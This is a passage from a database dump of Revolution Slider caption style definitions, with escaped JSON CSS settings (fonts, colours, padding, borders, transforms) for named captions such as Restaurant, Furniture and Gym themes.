Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(22,'.tp-caption.largegreenbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(23,'.tp-caption.excerpt','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px 4px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"-1.5px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\"},\"hover\":\"\"}'),(24,'.tp-caption.large_bold_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(25,'.tp-caption.medium_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(26,'.tp-caption.small_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(27,'.tp-caption.lightgrey_divider','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}','{\"idle\":{\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\"},\"hover\":\"\"}'),(28,'.tp-caption.large_bold_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(29,'.tp-caption.medium_bg_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(30,'.tp-caption.medium_bold_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(31,'.tp-caption.medium_light_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(32,'.tp-caption.medium_bg_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(33,'.tp-caption.medium_bold_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(34,'.tp-caption.medium_bg_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(35,'.tp-caption.grassfloor','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}','{\"idle\":{\"width\":\"4000px\",\"height\":\"150px\"},\"hover\":\"\"}'),(36,'.tp-caption.large_bold_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(37,'.tp-caption.medium_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(38,'.tp-caption.mediumlarge_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(39,'.tp-caption.mediumlarge_light_white_center','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(40,'.tp-caption.medium_bg_asbestos','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(41,'.tp-caption.medium_light_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(42,'.tp-caption.large_bold_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(43,'.tp-caption.mediumlarge_light_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(44,'.tp-caption.small_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(45,'.tp-caption.roundedimage','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(46,'.tp-caption.large_bg_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(47,'.tp-caption.mediumwhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(48,'.tp-caption.MarkerDisplay','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ff0000\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"font-style\":\"normal\",\"font-family\":\"Permanent Marker\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(49,'.tp-caption.Restaurant-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"120px\",\"line-height\":\"120px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(50,'.tp-caption.Restaurant-Cursive','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Nothing you could do\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(51,'.tp-caption.Restaurant-ScrollDownText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(52,'.tp-caption.Restaurant-Description','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(53,'.tp-caption.Restaurant-Price','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(54,'.tp-caption.Restaurant-Menuitem','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"Power2.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(55,'.tp-caption.Furniture-LogoText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"160px\",\"line-height\":\"150px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(56,'.tp-caption.Furniture-Plus','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0.5\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"6px\",\"7px\",\"4px\",\"7px\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\",\"box-shadow\":\"rgba(0,0,0,0.1) 0 1px 3px\"},\"hover\":\"\"}'),(57,'.tp-caption.Furniture-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(58,'.tp-caption.Furniture-Subtitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(59,'.tp-caption.Gym-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\